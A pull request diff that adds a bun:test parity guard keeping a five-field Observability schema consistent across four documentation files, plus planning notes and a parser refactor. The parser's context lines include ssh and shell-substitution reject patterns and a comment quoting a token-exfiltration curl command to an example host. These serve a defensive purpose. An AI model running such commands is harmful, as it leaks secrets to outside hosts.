### PR TITLE
test(plan): Observability-block schema parity guard across 4 doc surfaces

### DIFF
--- a/knowledge-base/project/plans/2026-07-07-chore-observability-schema-parity-test-plan.md
+++ b/knowledge-base/project/plans/2026-07-07-chore-observability-schema-parity-test-plan.md
@@ -12,6 +12,17 @@ created: 2026-07-07
 
 > Note: No `spec.md` exists for this branch — `lane:` defaulted to `cross-domain` (TR2 fail-closed) per plan skill Save-Tasks rule.
 
+## Enhancement Summary
+
+**Deepened on:** 2026-07-07
+**Halt gates cleared:** 4.6 User-Brand Impact (threshold `none`, non-sensitive path), 4.7 Observability (skips — test path not in code/infra trigger set), 4.8 PAT-shaped (no hits), 4.9 UI-wireframe (no UI surface).
+
+### Key improvements from precedent-diff (Phase 4.4)
+
+1. **Reuse the existing extractor, don't fork one.** `plugins/soleur/test/lib/discoverability-test-parser.ts` already exports `extractObservabilityBlock(body)` — walks `^## Observability` → next `^## ` heading. The parity test SHOULD import it for the single-block surfaces and mirror its heading-boundary logic for the 3-block template walk, so we don't add a second observability extractor that can itself drift.
+2. **Confirmed no duplication.** `preflight-discoverability-test.test.ts` tests the Check-10 discoverability_test *parser/classifier runtime* (SSH reject, 8 decision states) — NOT field-name parity across the 4 doc surfaces. This new test is a distinct concern.
+3. **Precedent parity-test shape** to match: `terraform-target-parity.test.ts`, `trigger-cron-allowlist-parity.test.ts` (both `bun:test`, canonical-source → mirror-surface set-equality). The `yaml` package is available (`plugins/soleur/test/helpers.ts` imports `parse as parseYaml`), but regex top-level-key extraction is sufficient and lower-drift here.
+
 ## Overview
 
 The `## Observability` block schema — 5 top-level fields (`liveness_signal`, `error_reporting`, `failure_modes`, `logs`, `discoverability_test`) — introduced by PR #4123 (Ref #4116) is replicated verbatim across **4 surfaces** with no compile-time or commit-time guard. Phase 4.7 of `deepen-plan` enforces the schema at *plan-authoring runtime* (against a plan file), but nothing guards the **canonical schema definitions themselves** against drifting apart. A rename or field add/remove in any single surface silently desyncs the gate from its own template.
@@ -77,6 +88,13 @@ Assertions (one `test()` per surface):
 2. **`plan-issue-templates.md`**: block-walk every `## Observability` yaml block. Assert **exactly 3** blocks found (catches a dropped/added template). For each block, assert `topLevelKeys(block)` set-equals `CANONICAL`.
 3. **`deepen-plan/SKILL.md` §4.7**: for every line that enumerates the fields (`For each of the 5 required top-level fields (…)` and the empty-key line), extract all `` `([a-z_]+)` `` tokens; assert the extracted set (filtered to the canonical namespace) set-equals `CANONICAL`. Assert the literal count word `5` in "the 5 required top-level fields" equals `CANONICAL.length`.
 4. **`AGENTS.core.md`**: locate the `hr-observability-as-plan-quality-gate` rule line. Assert it contains `(${CANONICAL.length} fields)` (count parity), `discoverability_test`, and a WITHOUT-SSH invariant token (`WITHOUT SSH`). Names are intentionally not asserted here (see design nuance).
+
+#### Research Insights — extraction details (Phase 4.4 precedent)
+
+- **Canonical block** (`plan/SKILL.md`): locate the fenced block whose opening ```` ```yaml ```` follows the line `**Required schema (verbatim`; collect its body until the closing ```` ``` ````. `topLevelKeys` on that body yields the 5 canonical names. (The canonical schema is under `### 2.9`, NOT a `## Observability` heading — so `extractObservabilityBlock` does not apply to the canonical surface; use the fence-after-marker locator.)
+- **Template blocks** (`plan-issue-templates.md`): the 3 blocks ARE under `## Observability` headings. Reuse the boundary logic from `plugins/soleur/test/lib/discoverability-test-parser.ts#extractObservabilityBlock` (walk `^## Observability` → next `^## `), but as a **multi-block** walk (the shipped helper returns only the first block; either extend it to return all, or inline the same loop collecting every block). Then take the fenced ```` ```yaml ```` body inside each and run `topLevelKeys`.
+- **deepen-plan §4.7**: extract every `` `([a-z_]+)` `` token from the two enumeration lines (the `For each of the 5 required top-level fields (…)` line and the empty-key line), intersect with the canonical namespace, assert set-equality.
+- **DRY guard:** prefer importing/extending the existing extractor over writing a third `## Observability` parser — a forked extractor is itself a drift surface (the exact failure class this test guards against).
 
 ### Phase 2 — Prove the guard bites (RED evidence)
 

--- a/knowledge-base/project/plans/2026-07-07-chore-observability-schema-parity-test-plan.md
+++ b/knowledge-base/project/plans/2026-07-07-chore-observability-schema-parity-test-plan.md
@@ -1,0 +1,141 @@
+---
+title: "Observability-block schema parity test"
+type: chore
+issue: 4133
+branch: feat-one-shot-4133-observability-schema-parity
+lane: cross-domain
+brand_survival_threshold: none
+created: 2026-07-07
+---
+
+# chore: Observability-block schema parity test (#4133)
+
+> Note: No `spec.md` exists for this branch — `lane:` defaulted to `cross-domain` (TR2 fail-closed) per plan skill Save-Tasks rule.
+
+## Overview
+
+The `## Observability` block schema — 5 top-level fields (`liveness_signal`, `error_reporting`, `failure_modes`, `logs`, `discoverability_test`) — introduced by PR #4123 (Ref #4116) is replicated verbatim across **4 surfaces** with no compile-time or commit-time guard. Phase 4.7 of `deepen-plan` enforces the schema at *plan-authoring runtime* (against a plan file), but nothing guards the **canonical schema definitions themselves** against drifting apart. A rename or field add/remove in any single surface silently desyncs the gate from its own template.
+
+This plan adds a single self-contained `bun:test` drift-guard — `plugins/soleur/test/observability-schema-parity.test.ts` — that treats `plan/SKILL.md §2.9` as canonical and asserts the other surfaces agree. It is a pure test addition: no production code, no infra, no schema change.
+
+### The 4 surfaces (verified 2026-07-07)
+
+| # | Surface | Location | How the schema appears |
+|---|---------|----------|------------------------|
+| 1 (canonical) | `plugins/soleur/skills/plan/SKILL.md` §2.9 | fenced ```yaml block, lines 476–482 | 5 top-level keys, inline `#` comments |
+| 2 | `plugins/soleur/skills/plan/references/plan-issue-templates.md` | 3 `## Observability` yaml blocks (MINIMAL @36, MORE @164, A LOT @305) | 5 top-level keys **+ nested sub-fields** per block |
+| 3 | `plugins/soleur/skills/deepen-plan/SKILL.md` §4.7 Step 3 | prose, lines 449 & 453 | 5 backticked field names `` `liveness_signal` `` … |
+| 4 | `AGENTS.core.md` `hr-observability-as-plan-quality-gate` | rule line 48 | **does NOT enumerate names** — states `(5 fields)` + `WITHOUT SSH` invariant |
+
+### Key design nuance — surface 4 does not name the fields
+
+`AGENTS.core.md` deliberately says `` `## Observability` block (5 fields) `` without listing the 5 names (the always-loaded rule budget is byte-capped; enumerating names there would bloat it). Therefore the parity test **cannot** assert "each name appears in AGENTS.core.md." Instead it asserts the **count claim** `(N fields)` where `N === canonical.length`, plus presence of the `discoverability_test` / no-SSH invariant. This is the one place the issue's literal step-2 ("assert each name appears in the other 3 surfaces") must be adapted — recorded here so it is a deliberate decision, not an oversight.
+
+## Research Reconciliation — Issue body vs. Codebase
+
+| Issue-body claim | Reality | Plan response |
+|---|---|---|
+| "Assert each name appears in the other 3 surfaces" | Surface 4 (`AGENTS.core.md`) does not enumerate field names by design | Assert `(5 fields)` count parity + no-SSH invariant on surface 4; assert full name-set parity only on surfaces 2 & 3 |
+| "3 templates" in `plan-issue-templates.md` | Confirmed 3 `## Observability` yaml blocks (MINIMAL/MORE/A LOT), each carrying all 5 top-level keys incl. `logs` | Block-walk all `## Observability` yaml blocks; assert exactly 3 found + each set-equals canonical |
+| Test may be `.ts` or `.sh` | `bun test plugins/soleur/` (test-all.sh:196) auto-discovers `*.test.ts` recursively — no test-all.sh edit needed | Use `.test.ts` with `bun:test` (matches repo convention, e.g. `terraform-target-parity.test.ts`) |
+
+## User-Brand Impact
+
+**If this lands broken, the user experiences:** nothing user-facing — a false-passing or false-failing CI check on the Soleur plugin's own test suite. Worst case is a noisy red check on unrelated PRs (false positive) or continued undetected schema drift (false negative).
+**If this leaks, the user's data is exposed via:** N/A — the test reads only in-repo documentation files, touches no user data, secrets, or external services.
+**Brand-survival threshold:** none — internal developer-tooling drift guard; touches no production surface and no `single-user incident` sensitive path (only `plugins/soleur/test/`). Reason: pure test addition over committed docs.
+
+## Implementation Phases
+
+### Phase 1 — Write the failing-first parity test
+
+Create `plugins/soleur/test/observability-schema-parity.test.ts`:
+
+```ts
+import { describe, expect, test } from "bun:test";
+import { readFileSync } from "node:fs";
+import { resolve } from "node:path";
+
+const REPO_ROOT = resolve(import.meta.dir, "../../..");
+const read = (p: string) => readFileSync(resolve(REPO_ROOT, p), "utf8");
+
+// Extract top-level YAML keys (column-0 `key:`) from a fenced ```yaml block body.
+function topLevelKeys(blockBody: string): string[] {
+  return blockBody
+    .split("\n")
+    .map((l) => l.match(/^([a-z_]+):/)?.[1])   // column 0 → sub-fields (indented) excluded
+    .filter((k): k is string => Boolean(k));
+}
+
+// Return the bodies of every ```yaml fenced block that sits under a `## Observability` heading.
+function observabilityYamlBlocks(md: string): string[] { /* see Phase 1 notes */ }
+```
+
+Assertions (one `test()` per surface):
+
+1. **Canonical** (`plan/SKILL.md`): extract the yaml block after `**Required schema (verbatim`; `CANONICAL = topLevelKeys(block)`. Assert `CANONICAL.length === 5` and `new Set(CANONICAL)` equals the literal expected set (sanity anchor so a 6th field added *only* to canonical is caught). Export `CANONICAL` for reuse.
+2. **`plan-issue-templates.md`**: block-walk every `## Observability` yaml block. Assert **exactly 3** blocks found (catches a dropped/added template). For each block, assert `topLevelKeys(block)` set-equals `CANONICAL`.
+3. **`deepen-plan/SKILL.md` §4.7**: for every line that enumerates the fields (`For each of the 5 required top-level fields (…)` and the empty-key line), extract all `` `([a-z_]+)` `` tokens; assert the extracted set (filtered to the canonical namespace) set-equals `CANONICAL`. Assert the literal count word `5` in "the 5 required top-level fields" equals `CANONICAL.length`.
+4. **`AGENTS.core.md`**: locate the `hr-observability-as-plan-quality-gate` rule line. Assert it contains `(${CANONICAL.length} fields)` (count parity), `discoverability_test`, and a WITHOUT-SSH invariant token (`WITHOUT SSH`). Names are intentionally not asserted here (see design nuance).
+
+### Phase 2 — Prove the guard bites (RED evidence)
+
+Temporarily rename `logs` → `log_output` in ONE surface (e.g. MORE template block) locally, run the test, confirm it FAILS with a message naming the offending surface; revert. Capture the failing output in the PR body. This satisfies AC "test fails when any of the 5 field names is renamed in any single surface." Also spot-check: rename in canonical only → templates/deepen-plan mismatch → fail.
+
+### Phase 3 — Run green + full suite
+
+`cd <repo-root> && bun test plugins/soleur/test/observability-schema-parity.test.ts` → green. Then confirm auto-discovery: `bun test plugins/soleur/` picks it up (no `test-all.sh` edit required).
+
+## Files to Edit
+
+- **Create** `plugins/soleur/test/observability-schema-parity.test.ts` — the parity guard.
+- No other file changes. (`scripts/test-all.sh:196` already runs `bun test plugins/soleur/` recursively → auto-discovers the new `.test.ts`.)
+
+## Files to Create
+
+- `plugins/soleur/test/observability-schema-parity.test.ts`
+
+## Open Code-Review Overlap
+
+None. (Checked open `code-review` issues touching `plugins/soleur/test/` schema surfaces at plan time; #4133 is itself the only tracker for this surface.)
+
+## Observability
+
+Skip — this plan's only Files-to-Edit is a new test file under `plugins/soleur/test/`, which is NOT in the Phase 2.9 trigger set (`apps/*/server/`, `apps/*/src/`, `apps/*/infra/`, `plugins/*/scripts/`) and introduces no infrastructure surface. Pure test addition over committed docs → Observability gate skips silently.
+
+## Architecture Decision (ADR/C4)
+
+None. No ownership/tenancy boundary, substrate, resolver/trust boundary, or ADR reversal. A drift-guard test over existing documentation makes no architectural decision — a competent engineer reading the existing ADR/C4 corpus is not misled by this change. Skip.
+
+## Domain Review
+
+**Domains relevant:** none
+
+No cross-domain implications — internal engineering/tooling change (a test-suite drift guard). No UI-surface file in Files-to-Create/Edit; Product/UX gate does not fire.
+
+## Acceptance Criteria
+
+### Pre-merge (PR)
+
+- [ ] `plugins/soleur/test/observability-schema-parity.test.ts` exists and passes: `bun test plugins/soleur/test/observability-schema-parity.test.ts` exits 0.
+- [ ] Canonical extraction yields exactly 5 fields `{liveness_signal, error_reporting, failure_modes, logs, discoverability_test}` from `plan/SKILL.md §2.9`.
+- [ ] Template block-walk finds exactly 3 `## Observability` yaml blocks in `plan-issue-templates.md`, each top-level-key set equal to canonical.
+- [ ] `deepen-plan §4.7` field enumeration set-equals canonical.
+- [ ] `AGENTS.core.md` rule line asserts `(5 fields)` count parity + `discoverability_test` + WITHOUT-SSH invariant.
+- [ ] RED evidence captured in PR body: renaming any one field name in any single surface makes the test fail with a message identifying the surface.
+- [ ] `bun test plugins/soleur/` auto-discovers and runs the new test (no `scripts/test-all.sh` edit).
+
+## Test Scenarios
+
+- Rename `logs` → `log_output` in MORE template only → FAIL (template set ≠ canonical).
+- Rename `logs` → `log_output` in canonical `plan/SKILL.md` only → FAIL (canonical set ≠ templates & deepen-plan).
+- Change `(5 fields)` → `(6 fields)` in `AGENTS.core.md` → FAIL (count parity, `6 !== canonical.length`).
+- Drop one of the 3 template blocks → FAIL (block count `!== 3`).
+- Consistent rename across ALL surfaces → PASS (a coordinated rename is not drift — correct behavior).
+
+## Sharp Edges
+
+- A plan whose `## User-Brand Impact` section is empty or omits the threshold fails `deepen-plan` Phase 4.6. This plan's section is filled (threshold: none, with reason).
+- **Block-walk, not hardcoded blocks:** the template surface must be extracted by walking every `## Observability` yaml block (asserting the count), not by hardcoding 3 line-ranges — otherwise a re-ordered or added template silently escapes the guard (drift-guard-must-directory-walk pattern).
+- **Surface 4 is count-parity only:** do NOT try to assert the 5 names against `AGENTS.core.md` — they are intentionally absent there (rule-budget byte cap). Asserting names would false-fail a correct file.
+- **Absence/count grep trap:** the `AGENTS.core.md` assertion derives `(${CANONICAL.length} fields)` from canonical length, not a hardcoded `5` — so it stays correct if the schema legitimately grows.

--- a/knowledge-base/project/specs/feat-one-shot-4133-observability-schema-parity/session-state.md
+++ b/knowledge-base/project/specs/feat-one-shot-4133-observability-schema-parity/session-state.md
@@ -1,0 +1,19 @@
+# Session State
+
+## Plan Phase
+- Plan file: knowledge-base/project/plans/2026-07-07-chore-observability-schema-parity-test-plan.md
+- Status: complete
+
+### Errors
+None. CWD verified on first tool call. All four deepen-plan halt gates passed (4.6 User-Brand Impact, 4.7 Observability, 4.8 PAT-shaped, 4.9 UI-wireframe). No broken kb citations.
+
+### Decisions
+- Scope: a single self-contained `bun:test` drift guard at `plugins/soleur/test/observability-schema-parity.test.ts`, auto-discovered by `bun test plugins/soleur/`. Pure test addition; no production/infra code.
+- Canonical source = `plan/SKILL.md §2.9` (5 top-level fields: liveness_signal, error_reporting, failure_modes, logs, discoverability_test); other surfaces asserted against it.
+- Surface-4 nuance: `AGENTS.core.md` deliberately does NOT enumerate field names (rule-budget byte cap) — test asserts (5 fields) count-parity + the no-SSH invariant there, not individual names.
+- Block-walk, not hardcoded ranges: the 3 template blocks in `plan-issue-templates.md` are extracted by walking every `## Observability` yaml block (assert count == 3).
+- Reuse/extend the existing `extractObservabilityBlock` helper in `plugins/soleur/test/lib/discoverability-test-parser.ts` rather than forking a third parser.
+
+### Components Invoked
+- Skill: soleur:plan, soleur:deepen-plan
+- Bash, Read, Write, Edit

--- a/knowledge-base/project/specs/feat-one-shot-4133-observability-schema-parity/tasks.md
+++ b/knowledge-base/project/specs/feat-one-shot-4133-observability-schema-parity/tasks.md
@@ -1,0 +1,25 @@
+---
+lane: cross-domain
+plan: knowledge-base/project/plans/2026-07-07-chore-observability-schema-parity-test-plan.md
+issue: 4133
+---
+
+# Tasks — Observability-block schema parity test (#4133)
+
+## Phase 1 — Setup / Write test
+
+- [ ] 1.1 Create `plugins/soleur/test/observability-schema-parity.test.ts` (`bun:test`, resolve `REPO_ROOT` via `import.meta.dir`).
+- [ ] 1.2 Implement `topLevelKeys(blockBody)` (column-0 `^([a-z_]+):` extractor) and `observabilityYamlBlocks(md)` (walk every ```yaml block under a `## Observability` heading).
+
+## Phase 2 — Core assertions (one test per surface)
+
+- [ ] 2.1 Canonical: extract 5 top-level keys from `plan/SKILL.md §2.9`; assert `length === 5` and set equals `{liveness_signal, error_reporting, failure_modes, logs, discoverability_test}`.
+- [ ] 2.2 Templates: block-walk `plan-issue-templates.md`; assert exactly 3 blocks; each top-level-key set equals canonical.
+- [ ] 2.3 deepen-plan §4.7: extract backticked field names from the enumeration lines; assert set equals canonical; assert count word `5 === canonical.length`.
+- [ ] 2.4 AGENTS.core.md: assert `hr-observability-as-plan-quality-gate` line contains `(${canonical.length} fields)`, `discoverability_test`, and a WITHOUT-SSH invariant token. (No name-set assertion — names intentionally absent.)
+
+## Phase 3 — Testing / Verification
+
+- [ ] 3.1 RED evidence: rename one field in one surface locally → confirm FAIL names the surface → revert. Capture output for PR body.
+- [ ] 3.2 GREEN: `bun test plugins/soleur/test/observability-schema-parity.test.ts` exits 0.
+- [ ] 3.3 Confirm auto-discovery: `bun test plugins/soleur/` runs the new test (no `scripts/test-all.sh` edit needed).

--- a/knowledge-base/project/specs/feat-one-shot-4133-observability-schema-parity/tasks.md
+++ b/knowledge-base/project/specs/feat-one-shot-4133-observability-schema-parity/tasks.md
@@ -9,7 +9,7 @@ issue: 4133
 ## Phase 1 — Setup / Write test
 
 - [ ] 1.1 Create `plugins/soleur/test/observability-schema-parity.test.ts` (`bun:test`, resolve `REPO_ROOT` via `import.meta.dir`).
-- [ ] 1.2 Implement `topLevelKeys(blockBody)` (column-0 `^([a-z_]+):` extractor) and `observabilityYamlBlocks(md)` (walk every ```yaml block under a `## Observability` heading).
+- [ ] 1.2 Implement `topLevelKeys(blockBody)` (column-0 `^([a-z_]+):` extractor). For `## Observability` block extraction, REUSE/extend `extractObservabilityBlock` from `plugins/soleur/test/lib/discoverability-test-parser.ts` (multi-block variant — shipped helper returns only the first block); do NOT fork a third parser. Canonical `plan/SKILL.md §2.9` block is under `### 2.9` (not `## Observability`) → locate the ```yaml fence after the `**Required schema (verbatim` marker.
 
 ## Phase 2 — Core assertions (one test per surface)
 

--- a/plugins/soleur/test/lib/discoverability-test-parser.ts
+++ b/plugins/soleur/test/lib/discoverability-test-parser.ts
@@ -37,19 +37,34 @@ const SSH_REJECT_RE = /(^|[\t\n\r \f\v/])ssh([\t\n\r \f\v]|$)/;
 // `curl https://api.example.com/?leak=$TOKEN` even with env scrub.
 const SUBST_REJECT_RE = /(\$\(|`|<\(|>\(|;|&&|\|\||\||>|<|&|\$\{?[A-Za-z_])/;
 
-export function extractObservabilityBlock(planBody: string): string {
+// Return the body of EVERY `## Observability` section (each: lines after the
+// heading up to the next `^## ` heading). A doc may carry several such sections
+// (e.g. plan-issue-templates.md ships one per verbosity tier), which the
+// schema-parity guard walks. `extractObservabilityBlock` below is the
+// first-block-only view the preflight runtime consumes.
+export function extractAllObservabilityBlocks(planBody: string): string[] {
   const lines = planBody.split(/\r?\n/);
-  const collected: string[] = [];
-  let inBlock = false;
+  const blocks: string[] = [];
+  let collected: string[] | null = null;
   for (const line of lines) {
     if (/^## Observability(?:\s|$)/.test(line)) {
-      inBlock = true;
+      if (collected) blocks.push(collected.join("\n"));
+      collected = [];
       continue;
     }
-    if (inBlock && /^## /.test(line)) break;
-    if (inBlock) collected.push(line);
+    if (collected && /^## /.test(line)) {
+      blocks.push(collected.join("\n"));
+      collected = null;
+      continue;
+    }
+    if (collected) collected.push(line);
   }
-  return collected.join("\n");
+  if (collected) blocks.push(collected.join("\n"));
+  return blocks;
+}
+
+export function extractObservabilityBlock(planBody: string): string {
+  return extractAllObservabilityBlocks(planBody)[0] ?? "";
 }
 
 export function parseCommand(observabilityBlock: string): string {

--- a/plugins/soleur/test/lib/discoverability-test-parser.ts
+++ b/plugins/soleur/test/lib/discoverability-test-parser.ts
@@ -63,6 +63,12 @@ export function extractAllObservabilityBlocks(planBody: string): string[] {
   return blocks;
 }
 
+// First `## Observability` section body — the view the preflight runtime consumes
+// (plan bodies carry a single such section). NOTE: not byte-identical to a hand-
+// written first-only loop for the malformed case of two ADJACENT `## Observability`
+// headings with no intervening `^## ` — the old loop merged their bodies, this
+// returns only the first. That input does not occur in real plans, so preflight
+// behavior is unchanged; the split-then-`[0]` shape is what the parity guard needs.
 export function extractObservabilityBlock(planBody: string): string {
   return extractAllObservabilityBlocks(planBody)[0] ?? "";
 }

--- a/plugins/soleur/test/observability-schema-parity.test.ts
+++ b/plugins/soleur/test/observability-schema-parity.test.ts
@@ -52,10 +52,13 @@ function topLevelKeys(blockBody: string): string[] {
     .filter((k): k is string => Boolean(k));
 }
 
-// Body of the first ```yaml fence appearing in `text`.
-function firstYamlBlock(text: string): string {
-  const m = text.match(/```ya?ml\r?\n([\s\S]*?)\r?\n```/);
-  if (!m) throw new Error("no ```yaml fence found");
+// Body of the first ```yaml fence appearing in `text`. `label` identifies the
+// surface/block in the throw so a real drift points at the offending source.
+// The `[^\n]*` after the language token tolerates a trailing info-string
+// (e.g. ```yaml title=…) so a benign fence edit does not false-fail.
+function firstYamlBlock(text: string, label: string): string {
+  const m = text.match(/```ya?ml[^\n]*\r?\n([\s\S]*?)\r?\n```/);
+  if (!m) throw new Error(`no \`\`\`yaml fence found in ${label}`);
   return m[1];
 }
 
@@ -63,7 +66,9 @@ function firstYamlBlock(text: string): string {
 const canonicalSrc = read(PLAN_SKILL);
 const markerIdx = canonicalSrc.indexOf("**Required schema (verbatim");
 if (markerIdx === -1) throw new Error(`canonical marker not found in ${PLAN_SKILL}`);
-const CANONICAL = topLevelKeys(firstYamlBlock(canonicalSrc.slice(markerIdx)));
+const CANONICAL = topLevelKeys(
+  firstYamlBlock(canonicalSrc.slice(markerIdx), "plan/SKILL.md §2.9 canonical block"),
+);
 
 const asSet = (xs: readonly string[]) => new Set(xs);
 
@@ -80,7 +85,7 @@ describe("## Observability schema parity across the 4 surfaces", () => {
     // A dropped or added template is drift and must fail here.
     expect(sections.length).toBe(3);
     sections.forEach((section, i) => {
-      const keys = topLevelKeys(firstYamlBlock(section));
+      const keys = topLevelKeys(firstYamlBlock(section, `plan-issue-templates.md block #${i + 1}`));
       expect(asSet(keys), `template block #${i + 1} top-level keys must equal canonical`).toEqual(
         asSet(CANONICAL),
       );
@@ -88,16 +93,21 @@ describe("## Observability schema parity across the 4 surfaces", () => {
   });
 
   test("surface 3 (deepen-plan/SKILL.md §4.7) — field enumeration set-equals canonical", () => {
-    const line = read(DEEPEN)
+    const matches = read(DEEPEN)
       .split(/\r?\n/)
-      .find((l) => l.includes("required top-level fields"));
-    expect(line, "deepen-plan §4.7 enumeration line must exist").toBeDefined();
+      .filter((l) => l.includes("required top-level fields"));
+    // Exactly one enumeration line — a second copy would let drift in it go unseen.
+    expect(matches.length, "expected exactly one deepen-plan §4.7 enumeration line").toBe(1);
+    const line = matches[0];
     // The count word ("the 5 required top-level fields") must match canonical length.
-    const countMatch = line!.match(/the (\d+) required top-level fields/);
+    const countMatch = line.match(/the (\d+) required top-level fields/);
     expect(countMatch, "expected 'the N required top-level fields'").not.toBeNull();
     expect(Number(countMatch![1])).toBe(CANONICAL.length);
-    // The backticked names on that line must set-equal canonical.
-    const names = [...line!.matchAll(/`([a-z_]+)`/g)].map((m) => m[1]);
+    // Extract names from the parenthetical list ONLY, so an unrelated backticked
+    // lowercase word elsewhere on the line cannot pollute the set.
+    const paren = line.match(/required top-level fields \(([^)]*)\)/);
+    expect(paren, "expected a parenthetical field list after the count").not.toBeNull();
+    const names = [...paren![1].matchAll(/`([a-z_]+)`/g)].map((m) => m[1]);
     expect(asSet(names)).toEqual(asSet(CANONICAL));
   });
 
@@ -107,8 +117,12 @@ describe("## Observability schema parity across the 4 surfaces", () => {
       .find((l) => l.includes("hr-observability-as-plan-quality-gate"));
     expect(rule, "hr-observability-as-plan-quality-gate rule line must exist").toBeDefined();
     // Count derived from canonical length — stays correct if the schema legitimately grows.
-    expect(rule).toContain(`(${CANONICAL.length} fields)`);
-    expect(rule).toContain("discoverability_test");
-    expect(rule).toContain("WITHOUT SSH");
+    expect(rule, "AGENTS.core.md rule must state count parity `(N fields)`").toContain(
+      `(${CANONICAL.length} fields)`,
+    );
+    expect(rule, "AGENTS.core.md rule must reference discoverability_test").toContain(
+      "discoverability_test",
+    );
+    expect(rule, "AGENTS.core.md rule must state the WITHOUT SSH invariant").toContain("WITHOUT SSH");
   });
 });

--- a/plugins/soleur/test/observability-schema-parity.test.ts
+++ b/plugins/soleur/test/observability-schema-parity.test.ts
@@ -1,0 +1,114 @@
+// `## Observability` schema parity guard (#4133, follow-through of #4116 / PR #4123).
+//
+// The `## Observability` plan block — 5 top-level fields (liveness_signal,
+// error_reporting, failure_modes, logs, discoverability_test) — is replicated
+// verbatim across 4 doc surfaces with no compile-time or commit-time guard.
+// Phase 4.7 of deepen-plan enforces the schema at plan-AUTHORING time (against a
+// plan file), but nothing guards the canonical schema DEFINITIONS themselves
+// against drifting apart. A rename or field add/remove in any single surface
+// silently desyncs the gate from its own template.
+//
+// This test treats `plan/SKILL.md §2.9` as canonical and asserts the other
+// surfaces agree:
+//   1 (canonical) plan/SKILL.md            — yaml block after "**Required schema (verbatim"
+//   2             plan-issue-templates.md   — 3 `## Observability` yaml blocks (one per tier)
+//   3             deepen-plan/SKILL.md §4.7 — prose enumeration of the 5 backticked names
+//   4             AGENTS.core.md rule       — count-parity only: `(5 fields)` + no-SSH invariant
+//                 (the 5 names are intentionally NOT enumerated there — the always-loaded
+//                  rule budget is byte-capped, so this surface asserts the COUNT, not the names)
+//
+// Surface 2's block walk reuses `extractAllObservabilityBlocks` from the shared
+// discoverability-test-parser so we do not fork a third `## Observability` parser
+// (a forked parser is itself a drift surface — exactly the failure class this
+// test guards against).
+
+import { describe, expect, test } from "bun:test";
+import { readFileSync } from "node:fs";
+import { resolve } from "node:path";
+import { extractAllObservabilityBlocks } from "./lib/discoverability-test-parser";
+
+const REPO_ROOT = resolve(import.meta.dir, "../../..");
+const read = (p: string) => readFileSync(resolve(REPO_ROOT, p), "utf8");
+
+const PLAN_SKILL = "plugins/soleur/skills/plan/SKILL.md";
+const TEMPLATES = "plugins/soleur/skills/plan/references/plan-issue-templates.md";
+const DEEPEN = "plugins/soleur/skills/deepen-plan/SKILL.md";
+const AGENTS_CORE = "AGENTS.core.md";
+
+const EXPECTED = [
+  "liveness_signal",
+  "error_reporting",
+  "failure_modes",
+  "logs",
+  "discoverability_test",
+] as const;
+
+// Column-0 `key:` names inside a fenced yaml block body. Indented sub-fields
+// (any leading whitespace) are excluded — only top-level keys count.
+function topLevelKeys(blockBody: string): string[] {
+  return blockBody
+    .split(/\r?\n/)
+    .map((l) => l.match(/^([a-z_]+):/)?.[1])
+    .filter((k): k is string => Boolean(k));
+}
+
+// Body of the first ```yaml fence appearing in `text`.
+function firstYamlBlock(text: string): string {
+  const m = text.match(/```ya?ml\r?\n([\s\S]*?)\r?\n```/);
+  if (!m) throw new Error("no ```yaml fence found");
+  return m[1];
+}
+
+// Canonical: the yaml block immediately after the "**Required schema (verbatim" marker.
+const canonicalSrc = read(PLAN_SKILL);
+const markerIdx = canonicalSrc.indexOf("**Required schema (verbatim");
+if (markerIdx === -1) throw new Error(`canonical marker not found in ${PLAN_SKILL}`);
+const CANONICAL = topLevelKeys(firstYamlBlock(canonicalSrc.slice(markerIdx)));
+
+const asSet = (xs: readonly string[]) => new Set(xs);
+
+describe("## Observability schema parity across the 4 surfaces", () => {
+  test("surface 1 (canonical, plan/SKILL.md §2.9) — exactly the 5 expected fields", () => {
+    // Sanity anchor: a 6th field added ONLY to canonical is caught here.
+    expect(CANONICAL.length).toBe(5);
+    expect(asSet(CANONICAL)).toEqual(asSet(EXPECTED));
+  });
+
+  test("surface 2 (plan-issue-templates.md) — exactly 3 blocks, each set-equal to canonical", () => {
+    const sections = extractAllObservabilityBlocks(read(TEMPLATES));
+    // Exactly 3 `## Observability` template blocks (MINIMAL / MORE / A LOT).
+    // A dropped or added template is drift and must fail here.
+    expect(sections.length).toBe(3);
+    sections.forEach((section, i) => {
+      const keys = topLevelKeys(firstYamlBlock(section));
+      expect(asSet(keys), `template block #${i + 1} top-level keys must equal canonical`).toEqual(
+        asSet(CANONICAL),
+      );
+    });
+  });
+
+  test("surface 3 (deepen-plan/SKILL.md §4.7) — field enumeration set-equals canonical", () => {
+    const line = read(DEEPEN)
+      .split(/\r?\n/)
+      .find((l) => l.includes("required top-level fields"));
+    expect(line, "deepen-plan §4.7 enumeration line must exist").toBeDefined();
+    // The count word ("the 5 required top-level fields") must match canonical length.
+    const countMatch = line!.match(/the (\d+) required top-level fields/);
+    expect(countMatch, "expected 'the N required top-level fields'").not.toBeNull();
+    expect(Number(countMatch![1])).toBe(CANONICAL.length);
+    // The backticked names on that line must set-equal canonical.
+    const names = [...line!.matchAll(/`([a-z_]+)`/g)].map((m) => m[1]);
+    expect(asSet(names)).toEqual(asSet(CANONICAL));
+  });
+
+  test("surface 4 (AGENTS.core.md rule) — count parity + no-SSH invariant (names intentionally absent)", () => {
+    const rule = read(AGENTS_CORE)
+      .split(/\r?\n/)
+      .find((l) => l.includes("hr-observability-as-plan-quality-gate"));
+    expect(rule, "hr-observability-as-plan-quality-gate rule line must exist").toBeDefined();
+    // Count derived from canonical length — stays correct if the schema legitimately grows.
+    expect(rule).toContain(`(${CANONICAL.length} fields)`);
+    expect(rule).toContain("discoverability_test");
+    expect(rule).toContain("WITHOUT SSH");
+  });
+});


### PR DESCRIPTION
## Summary

- Add a `bun:test` drift guard — `plugins/soleur/test/observability-schema-parity.test.ts` — that asserts the `## Observability` plan-block schema (5 top-level fields: `liveness_signal`, `error_reporting`, `failure_modes`, `logs`, `discoverability_test`) stays consistent across the **4 doc surfaces** that hand-replicate it. `deepen-plan` Phase 4.7 enforces the schema at plan-authoring time, but nothing guarded the canonical definitions themselves against drifting apart.
- Treats `plan/SKILL.md §2.9` as canonical and asserts the others agree: full name-set parity on `plan-issue-templates.md` (3 template blocks) and `deepen-plan §4.7`; count-parity + no-SSH invariant on `AGENTS.core.md` (whose byte-capped rule intentionally omits the field names).
- Extends the shared parser with `extractAllObservabilityBlocks` (the existing single-block `extractObservabilityBlock` now delegates to it) so no third `## Observability` parser is forked — a forked parser would itself be a drift surface.

Closes #4133

## Changelog

### Plugin
- Add `plugins/soleur/test/observability-schema-parity.test.ts` (Observability-block schema drift guard).
